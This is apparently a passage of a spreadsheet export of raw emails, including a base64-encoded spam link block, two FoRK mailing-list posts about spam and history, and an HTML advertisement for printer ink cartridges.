 Y2VscjguY29tL3ZpZGVvL2hjX3ZpZGVvLmh0bT4NCjxpbWcgc3JjPWh0dHA6Ly93d3cuYW5nZWxm
 aXJlLmNvbS84MHMvcGljOS94dWVhbi5naWYgYWx0PWh0dHA6Ly93d3cuYW5nZWxmaXJlLmNvbS84
 MHMvcGljOS94dWVhbi5naWY+DQo8L2E+DQoNCjxhIGhyZWY9aHR0cDovL3JvY2lvNjMuaG9wdG8u
 b3JnL2ZsYXNoPg0KPGltZyBzcmM9aHR0cDovL3d3dy5hbmdlbGZpcmUuY29tLzgwcy9waWM5L2Fs
 bGFjY2VwdC5naWYgYWx0PWh0dHA6Ly93d3cuYW5nZWxmaXJlLmNvbS84MHMvcGljOS9hbGxhY2Nl
 cHQuZ2lmPg0KPC9hPg0KDQo8YSBocmVmPWh0dHA6Ly9leGFtLmhvcHRvLm9yZy9zZWU+DQo8aW1n
 IHNyYz1odHRwOi8vd3d3LmFuZ2VsZmlyZS5jb20vODBzL3BpYzkvc2hvdWppZS5qcGcgYWx0PWh0
 dHA6Ly93d3cuYW5nZWxmaXJlLmNvbS84MHMvcGljOS9zaG91amllLmpwZz4NCjwvYT4NCg0KPGEg
 aHJlZj1odHRwczovL3RpYW5kaS5zeXRlcy5uZXQ+DQo8aW1nIHNyYz1odHRwOi8vd3d3LmFuZ2Vs
 ZmlyZS5jb20vODBzL3BpYzkvdGFpd2FuLmdpZiBhbHQ9aHR0cDovL3d3dy5hbmdlbGZpcmUuY29t
 Lzgwcy9waWM5L3RhaXdhbi5naWY+DQo8L2E+
 ------=_NextPart_a4U4f4Lb5R29pMZQoWcLdBAFKnAA--
 ------=_NextPart_a4U4f4Lb5R29pMZQoWcLdBAFKn--
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy wrote
 &gt;&gt;&gt;&gt;&gt;&gt;"R" == Russell Turpin &lt;deafbox@hotmail.com&gt; writes:
 &gt;&gt;&gt;&gt;&gt;&gt;
 &gt;
 &gt;    R&gt; ... spam is the result of government. The government is
 &gt;    R&gt; ineffective at preventing spam, but it DOES prevent individuals
 &gt;    R&gt; and ISPs from taking retribution against spammers.
 &gt;
 &gt;I don't understand this assertion.  Can you explain?
 &gt;...
 &gt;So where does government come in to foster this?
 &gt;
 The government prevents me from hunting them down and flossing with 
 their sinew after I'm done with them. Sometimes I wish for a return to 
 the common sense laws of the old west... "You used my inbox without my 
 permission varmit, and now yer gonna pay!"
 Elias
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Wasn't the Aztec population that greeted Cortez already largely
 decimated by the microbiology brought over by DeSoto nearly a hundred
 years before?
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Language" content="en-ie"&gt;
 &lt;meta name="Microsoft Theme 2.00" content="9to6 1011 011"&gt;
 &lt;meta http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;meta name=Generator content="Microsoft FrontPage 5.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;base href="http://www.9to6.ie/9to6_special_2.htm"&gt;
 &lt;title&gt;ink_refill_toner&lt;/title&gt;
 &lt;link rel=Stylesheet type="text/css" media=all
 href="http://www.9to6.ie/9to6_special_2.files/9to61011.css"&gt;
 &lt;style&gt;
 &lt;!--
  /* Font Definitions */
  @font-face
 	{font-family:&amp;#23435;&amp;#20307;;
 	panose-1:2 1 6 0 3 1 1 1 1 1;}
 @font-face
 	{font-family:"Century Gothic";
 	panose-1:2 11 5 2 2 2 2 2 2 4;}
 @font-face
 	{font-family:Verdana;
 	panose-1:2 11 6 4 3 5 4 4 2 4;}
 @font-face
 	{font-family:"\@&amp;#23435;&amp;#20307;";
 	panose-1:2 1 6 0 3 1 1 1 1 1;}
  /* Style Definitions */
  p.MsoNormal, li.MsoNormal, div.MsoNormal
 	{margin-bottom:.0001pt;
 	font-size:12.0pt;
 	font-family:&amp;#23435;&amp;#20307; margin-left:0cm; margin-right:0cm;
 margin-top:0cm}
 h1
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:18.0pt;}
 h2
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:16.0pt;}
 h3
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:14.0pt;}
 h4
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:12.0pt;}
 h5
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:10.0pt;}
 h6
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;}
 p
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.mstheme-bannertxt, li.mstheme-bannertxt, div.mstheme-bannertxt
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:4.0pt;}
 p.mstheme-horiz-navtxt, li.mstheme-horiz-navtxt, div.mstheme-horiz-navtxt
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:1.0pt;}
 p.mstheme-vert-navtxt, li.mstheme-vert-navtxt, div.mstheme-vert-navtxt
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:1.0pt;}
 p.mstheme-navtxthome, li.mstheme-navtxthome, div.mstheme-navtxthome
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:1.0pt;}
 p.mstheme-navtxtnext, li.mstheme-navtxtnext, div.mstheme-navtxtnext
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:1.0pt;}
 p.mstheme-navtxtprev, li.mstheme-navtxtprev, div.mstheme-navtxtprev
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:1.0pt;}
 p.mstheme-navtxtup, li.mstheme-navtxtup, div.mstheme-navtxtup
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:1.0pt;}
 p.mstheme-text, li.mstheme-text, div.mstheme-text
 	{margin-right:0cm;
 	margin-left:0cm;
 	background:black;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.mstheme-bannertxt-g, li.mstheme-bannertxt-g, div.mstheme-bannertxt-g
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:4.0pt;}
 p.mstheme-bannertxt-s, li.mstheme-bannertxt-s, div.mstheme-bannertxt-s
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:4.0pt;}
 p.mstheme-horiz-navtxt-g, li.mstheme-horiz-navtxt-g,
 div.mstheme-horiz-navtxt-g
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:1.0pt;}
 p.mstheme-horiz-navtxt-gs, li.mstheme-horiz-navtxt-gs,
 div.mstheme-horiz-navtxt-gs
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:1.0pt;}
 p.mstheme-navtxthome-g, li.mstheme-navtxthome-g, div.mstheme-navtxthome-g
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:1.0pt;}
 p.mstheme-navtxthome-gs, li.mstheme-navtxthome-gs, div.mstheme-navtxthome-gs
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:1.0pt;}
 p.mstheme-navtxtnext-g, li.mstheme-navtxtnext-g, div.mstheme-navtxtnext-g
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:1.0pt;}
 p.mstheme-navtxtnext-gs, li.mstheme-navtxtnext-gs, div.mstheme-navtxtnext-gs
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:1.0pt;}
 p.mstheme-navtxtprev-g, li.mstheme-navtxtprev-g, div.mstheme-navtxtprev-g
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:1.0pt;}
 p.mstheme-navtxtprev-gs, li.mstheme-navtxtprev-gs, div.mstheme-navtxtprev-gs
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:1.0pt;}
 p.mstheme-navtxtup-g, li.mstheme-navtxtup-g, div.mstheme-navtxtup-g
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:1.0pt;}
 p.mstheme-navtxtup-gs, li.mstheme-navtxtup-gs, div.mstheme-navtxtup-gs
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:1.0pt;}
 p.mstheme-topbar-font-g, li.mstheme-topbar-font-g, div.mstheme-topbar-font-g
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:10.0pt;}
 p.mstheme-vert-navtxt-g, li.mstheme-vert-navtxt-g, div.mstheme-vert-navtxt-g
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:1.0pt;}
 p.mstheme-vert-navtxt-gs, li.mstheme-vert-navtxt-gs,
 div.mstheme-vert-navtxt-gs
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:1.0pt;}
 p.ms-addnew, li.ms-addnew, div.ms-addnew
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;}
 p.ms-announcementtitle, li.ms-announcementtitle, div.ms-announcementtitle
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-appt, li.ms-appt, div.ms-appt
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	background:#666666;
 	border:medium none;
 	padding:0cm;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-authoringcontrols, li.ms-authoringcontrols, div.ms-authoringcontrols
 	{margin-right:0cm;
 	margin-left:0cm;
 	background:#666666;
 	font-size:9.0pt;}
 p.ms-banner, li.ms-banner, div.ms-banner
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:10.0pt;}
 p.ms-bannerframe, li.ms-bannerframe, div.ms-bannerframe
 	{margin-right:0cm;
 	margin-left:0cm;
 	background:#6600FF;
 	border:medium none;
 	padding:0cm;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-cal, li.ms-cal, div.ms-cal
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;}
 p.ms-calbot, li.ms-calbot, div.ms-calbot
 	{margin-right:0cm;
 	margin-left:0cm;
 	border:medium none;
 	padding:0cm;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-caldow, li.ms-caldow, div.ms-caldow
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	border:medium none;
 	padding:0cm;
 	font-size:10.0pt;
 	font-family:&amp;#23435;&amp;#20307;;
 	font-weight:bold}
 p.ms-caldowdown, li.ms-caldowdown, div.ms-caldowdown
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307;;
 	font-weight:bold;
 	font-style:italic}
 p.ms-caldown, li.ms-caldown, div.ms-caldown
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-calhead, li.ms-calhead, div.ms-calhead
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	background:#6600FF;
 	font-size:16.0pt;}
 p.ms-calmid, li.ms-calmid, div.ms-calmid
 	{margin-right:0cm;
 	margin-left:0cm;
 	border:medium none;
 	padding:0cm;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-calspacer, li.ms-calspacer, div.ms-calspacer
 	{margin-right:0cm;
 	margin-left:0cm;
 	border:medium none;
 	padding:0cm;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-caltop, li.ms-caltop, div.ms-caltop
 	{margin-right:0cm;
 	margin-left:0cm;
 	border:medium none;
 	padding:0cm;
 	font-size:10.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-datepicker, li.ms-datepicker, div.ms-datepicker
 	{margin-right:0cm;
 	margin-left:0cm;
 	background:#210873;
 	font-size:9.0pt;}
 p.ms-datepickeriframe, li.ms-datepickeriframe, div.ms-datepickeriframe
 	{margin-right:0cm;
 	margin-left:0cm;
 	background:white;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-descriptiontext, li.ms-descriptiontext, div.ms-descriptiontext
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;}
 p.ms-discussiontitle, li.ms-discussiontitle, div.ms-discussiontitle
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;}
 p.ms-dpday, li.ms-dpday, div.ms-dpday
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-dpdow, li.ms-dpdow, div.ms-dpdow
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	border:medium none;
 	padding:0cm;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307;;
 	font-weight:bold}
 p.ms-dpfoot, li.ms-dpfoot, div.ms-dpfoot
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	border:medium none;
 	padding:0cm;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307;;
 	font-style:italic}
 p.ms-dphead, li.ms-dphead, div.ms-dphead
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	background:#5F8AC5;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307;;
 	font-weight:bold}
 p.ms-dpnonmonth, li.ms-dpnonmonth, div.ms-dpnonmonth
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-dpselectedday, li.ms-dpselectedday, div.ms-dpselectedday
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	background:#6600FF;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-formbody, li.ms-formbody, div.ms-formbody
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;}
 p.ms-formdescription, li.ms-formdescription, div.ms-formdescription
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;}
 p.ms-formlabel, li.ms-formlabel, div.ms-formlabel
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;}
 p.ms-homepagetitle, li.ms-homepagetitle, div.ms-homepagetitle
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:12.0pt;
 	font-weight:bold;}
 p.ms-input, li.ms-input, div.ms-input
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;}
 p.ms-long, li.ms-long, div.ms-long
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;}
 p.ms-main, li.ms-main, div.ms-main
 	{margin-right:0cm;
 	margin-left:0cm;
 	border:medium none;
 	padding:0cm;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-navframe, li.ms-navframe, div.ms-navframe
 	{margin-right:0cm;
 	margin-left:0cm;
 	border:medium none;
 	padding:0cm;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-pagetitle, li.ms-pagetitle, div.ms-pagetitle
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:14.0pt;
 	font-weight:bold;}
 p.ms-propertysheet, li.ms-propertysheet, div.ms-propertysheet
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;}
 p.ms-radiotext, li.ms-radiotext, div.ms-radiotext
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;}
 p.ms-searchbox, li.ms-searchbox, div.ms-searchbox
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-sectionheader, li.ms-sectionheader, div.ms-sectionheader
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:11.0pt;
 	font-weight:bold;}
 p.ms-sectionline, li.ms-sectionline, div.ms-sectionline
 	{margin-right:0cm;
 	margin-left:0cm;
 	background:#66CCFF;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-selected, li.ms-selected, div.ms-selected
 	{margin-right:0cm;
 	margin-left:0cm;
 	background:#FFCC00;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-separator, li.ms-separator, div.ms-separator
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:10.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-titlearea, li.ms-titlearea, div.ms-titlearea
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;}
 p.ms-titleareaframe, li.ms-titleareaframe, div.ms-titleareaframe
 	{margin-right:0cm;
 	margin-left:0cm;
 	border:medium none;
 	padding:0cm;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-toolbar, li.ms-toolbar, div.ms-toolbar
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;}
 p.ms-vb, li.ms-vb, div.ms-vb
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;}
 p.ms-verticaldots, li.ms-verticaldots, div.ms-verticaldots
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.ms-vh, li.ms-vh, div.ms-vh
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;}
 p.ms-wvsel, li.ms-wvsel, div.ms-wvsel
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;
 	font-family:&amp;#23435;&amp;#20307}
 p.mstheme-topbar-font, li.mstheme-topbar-font, div.mstheme-topbar-font
 	{margin-right:0cm;
 	margin-left:0cm;
 	text-align:center;
 	font-size:10.0pt;}
 p.mstheme-label, li.mstheme-label, div.mstheme-label
 	{margin-right:0cm;
 	margin-left:0cm;
 	font-size:9.0pt;}
 span.1
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.10
 	{color:#FF9900;
 	text-decoration:underline;}
 span.2
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.20
 	{color:#FF9900;
 	text-decoration:underline;}
 span.3
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.30
 	{color:#FF9900;
 	text-decoration:underline;}
 span.4
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.40
 	{color:#FF9900;
 	text-decoration:underline;}
 span.5
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.50
 	{color:#FF9900;
 	text-decoration:underline;}
 span.6
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.60
 	{color:#FF9900;
 	text-decoration:underline;}
 span.7
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.70
 	{color:#FF9900;
 	text-decoration:underline;}
 span.8
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.80
 	{color:#FF9900;
 	text-decoration:underline;}
 span.9
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.90
 	{color:#FF9900;
 	text-decoration:underline;}
 span.100
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.101
 	{color:#FF9900;
 	text-decoration:underline;}
 span.11
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.110
 	{color:#FF9900;
 	text-decoration:underline;}
 span.12
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.120
 	{color:#FF9900;
 	text-decoration:underline;}
 span.13
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.130
 	{color:#FF9900;
 	text-decoration:underline;}
 span.14
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.140
 	{color:#FF9900;
 	text-decoration:underline;}
 span.15
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.150
 	{color:#FF9900;
 	text-decoration:underline;}
 span.16
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.160
 	{color:#FF9900;
 	text-decoration:underline;}
 span.17
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.170
 	{color:#FF9900;
 	text-decoration:underline;}
 span.18
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.180
 	{color:#FF9900;
 	text-decoration:underline;}
 span.19
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.190
 	{color:#FF9900;
 	text-decoration:underline;}
 span.200
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.201
 	{color:#FF9900;
 	text-decoration:underline;}
 span.21
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.210
 	{color:#FF9900;
 	text-decoration:underline;}
 span.22
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.220
 	{color:#FF9900;
 	text-decoration:underline;}
 span.23
 	{color:#FFCC00;
 	text-decoration:underline;}
 span.230
 	{color:#FF9900;
 	text-decoration:underline;}
 span.24
 	{font-family:Verdana;
 	color:white;
 	font-weight:normal;
 	text-decoration:none none;}
 span.240
 	{font-family:Verdana;
 	color:#CC99FF;
 	font-weight:normal;
 	text-decoration:none none;}
 span.25
 	{font-family:Verdana;
 	color:#CC99FF;
 	font-weight:normal;
 	text-decoration:none none;}
 span.250
 	{font-family:Verdana;
 	color:white;
 	font-weight:normal;
 	text-decoration:none none;}
 span.26
 	{color:#CC99FF;
 	text-decoration:underline;}
 span.260
 	{color:white;
 	text-decoration:underline;}
 span.27
 	{color:#CC99FF;
 	text-decoration:underline;}
 span.270
 	{color:white;
 	text-decoration:none none;}
 span.28
 	{color:#CC99FF;
 	text-decoration:none none;}
 span.280
 	{color:white;
 	text-decoration:none none;}
 span.29
 	{color:#CC99FF;
 	text-decoration:none none;}
 span.290
 	{color:#CCFFFF;
 	text-decoration:none none;}
 span.300
 	{color:#CC99FF;
 	text-decoration:none none;}
 span.301
 	{font-family:Verdana;
 	color:white;
 	text-decoration:none none;}
 span.31
 	{color:#CC99FF;
 	text-decoration:none none;}
 @page Section1
 	{size:595.3pt 841.9pt;
 	margin:72.0pt 90.0pt 72.0pt 90.0pt;}
 div.Section1
 	{page:Section1;}
 --&gt;
 &lt;/style&gt;
 &lt;meta content="tlb, default" name="Microsoft Border"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=white
 background="http://www.9to6.ie/9to6_special_2.files/bg.jpg"
 lang=ZH-CN link="#660066" vlink="#996699"&gt;
 &lt;div class=Section1&gt;
 &lt;div style="width: 893; height: 15"&gt;
 &lt;p class=MsoNormal&gt;&lt;span lang=EN-US
 style='font-size:9.0pt;font-family:Arial;
 color:black'&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
 &lt;/div&gt;
 &lt;p align=center style='text-align:center'&gt;&lt;span lang=EN-US style='font-size:
 10.0pt;font-family:Arial;color:black'&gt;&lt;a href="http://www.9to6.ie/"&gt;&lt;span
 style='text-decoration:none'&gt;&lt;img border=0 width=108 height=87
 src="http://www.9to6.ie/9to6_special_2.files/9to6logo.gif"&gt;&lt;/span&gt;&lt;/a&gt;
 &lt;/span&gt;&lt;/p&gt;
 &lt;h4&gt;&lt;b&gt;&lt;span lang=EN-US
 style='font-size:10.0pt;font-family:Arial;color:navy'&gt;PRINTER
 INK CARTRIDGES &amp;amp; REFILL KITS&lt;/span&gt;&lt;/b&gt;&lt;span lang=EN-US
 style='font-size:
 10.0pt;font-family:Arial;color:navy'&gt; from &lt;/span&gt; &lt;b&gt;
 &lt;font face="Arial Rounded MT Bold" size="2" color="#000080"&gt;&lt;/font&gt;&lt;span
 lang=EN-US style='font-size:
 10.0pt;font-family:Arial;color:navy'&gt;4.85... BULK ORDERS &lt;/span&gt; &lt;/b&gt;&lt;span
 lang=EN-US style='font-size:
 10.0pt;font-family:Arial;color:navy'&gt;or &lt;b&gt;TRADE
 &lt;/b&gt;welcome...&lt;b&gt;&amp;nbsp; &lt;/b&gt;please contact us at&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;span
 lang=EN-US style='font-size:10.0pt;font-family:Arial'&gt;&lt;a
 href="mailto:info@9to6.ie"&gt;info@9to6.ie&lt;/a&gt;&lt;/span&gt;&lt;b&gt;&lt;span lang=EN-US
 style='font-size:10.0pt;font-family:Arial;color:navy'&gt; &lt;/span&gt;&lt;/b&gt;&lt;span
 lang=EN-US style='font-size:10.0pt;font-family:Arial;color:navy'&gt;for
 discounted
 prices&lt;b&gt; &lt;/b&gt;guaranteed to give you huge savings of between
 50-300%.&amp;nbsp; We
 provide an excellent &lt;b&gt;PRINTING &amp;amp; GRAPHICS DESIGN SERVICE&lt;/b&gt; at
 competitive prices.&amp;nbsp; &lt;b&gt;T-SHIRT PRINTING SERVICE&lt;/b&gt; - just send any
 picture and we'll put them on a t-shirt for you.&amp;nbsp; We also stock a
 range of
 &lt;b&gt;GIFTS&lt;/b&gt; and &lt;b&gt;NOVELTY LIGHTING&lt;/b&gt;.&amp;nbsp; Don't miss out, visit our
 site
 at &lt;a href="http://www.9to6.ie/"&gt;http://www.9to6.ie/&lt;/a&gt;
 &lt;b&gt;NOW&lt;/b&gt;!&lt;/span&gt;&lt;/h4&gt;
 &lt;table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0
 width="100%"
  style='width:100.0%;border-collapse:collapse;border:none' id=AutoNumber6
  height=373&gt;
  &lt;tr style='height:12.0pt'&gt;
   &lt;td width="50%" style='width:50.0%;border:none;padding:0cm 0cm 0cm 0cm;
   height:12.0pt'&gt;
   &lt;p align=center style='text-align:center'&gt;&lt;b&gt;&lt;i&gt;&lt;span lang=EN-US
   style='font-size:12.0pt;font-family:Arial;color:black'&gt;&lt;a
   href="http://www.9to6.ie/ink_jet_cartridges1.htm"&gt;Ink
 Cartridges&lt;/a&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;/td&gt;
   &lt;td width="50%" style='width:50.0%;border:none;padding:0cm 0cm 0cm 0cm;
   height:12.0pt'&gt;
   &lt;table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0
 width="100%"
    style='width:100.0%;border-collapse:collapse;border:none' id=AutoNumber7&gt;
    &lt;tr&gt;
     &lt;td width="100%" style='width:100.0%;border:none;padding:0cm 0cm 0cm
 0cm'&gt;
     &lt;p align=center style='text-align:center'&gt;&lt;b&gt;&lt;i&gt;&lt;span lang=EN-US
     style='font-size:12.0pt;font-family:Arial;color:black'&gt;&lt;a
     href="http://www.9to6.ie/toner_specials.htm"&gt;LASER PRINTER CARTRIDGES
 AND
     TONER KITS&lt;/a&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;
     &lt;/td&gt;
    &lt;/tr&gt;
   &lt;/table&gt;
   &lt;p class=MsoNormal&gt;&lt;/p&gt;
   &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr style='height:112.5pt'&gt;
   &lt;td width="50%" style='width:50.0%;border:none;padding:0cm 0cm 0cm 0cm;
   height:112.5pt'&gt;
   &lt;p align=center style='text-align:center'&gt;&lt;span lang=EN-US
 style='font-family:
   Arial;color:black'&gt;&lt;a
 href="http://www.9to6.ie/ink_jet_cartridges1.htm"&gt;&lt;span
   style='text-decoration:none'&gt;&lt;img border=0 width=83 height=82
   src="http://www.9to6.ie/9to6_special_2.files/magic.gif"
 alt="http://www.9to6.ie/9to6_special_2.files/magic.gif"&gt;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;
 &lt;/p&gt;
   &lt;/td&gt;
   &lt;td width="50%" style='width:50.0%;border:none;padding:0cm 0cm 0cm 0cm;
   height:112.5pt'&gt;
   &lt;p align=center style='text-align:center'&gt;&lt;span lang=EN-US
 style='font-family:
   Arial;color:black'&gt;&lt;a href="http://www.9to6.ie/toner_specials.htm"&gt;&lt;span
   style='text-decoration:none'&gt;&lt;img border=0 width=250 height=152
 src="http://www.9to6.ie/9to6_special_2.files/laser.gif"&gt;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;
 &lt;/p&gt;
   &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr style='height:150.75pt'&gt;
   &lt;td width="50%" style='width:50.0%;border:none;padding:0cm 0cm 0cm 0cm;
   height:150.75pt'&gt;
   &lt;p align=center style='text-align:center'&gt;&lt;b&gt;&lt;i&gt;&lt;span lang=EN-US
   style='font-size:12.0pt;font-family:Arial;color:black'&gt;&lt;a
   href="http://www.9to6.ie/refill_system.htm"&gt;Refill
 System&lt;/a&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span
   lang=EN-US style='font-family:Arial;color:black'&gt; &lt;/span&gt;&lt;/p&gt;
   &lt;p align=center style='text-align:center'&gt;&lt;span lang=EN-US
 style='font-family:
   Arial;color:black'&gt;&lt;a href="http://www.9to6.ie/refill_system.htm"&gt;&lt;span
   style='text-decoration:none'&gt;&lt;img border=0 width=207 height=150
 src="http://www.9to6.ie/9to6_special_2.files/r_ink.gif"&gt;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;
 &lt;/p&gt;
   &lt;p align=center style='text-align:center'&gt;&lt;span lang=EN-US
 style='font-family:
   Arial;color:black'&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
   &lt;/td&gt;
   &lt;td width="50%" valign=top style='width:50.0%;border:none;padding:0cm
 0cm 0cm 0cm;
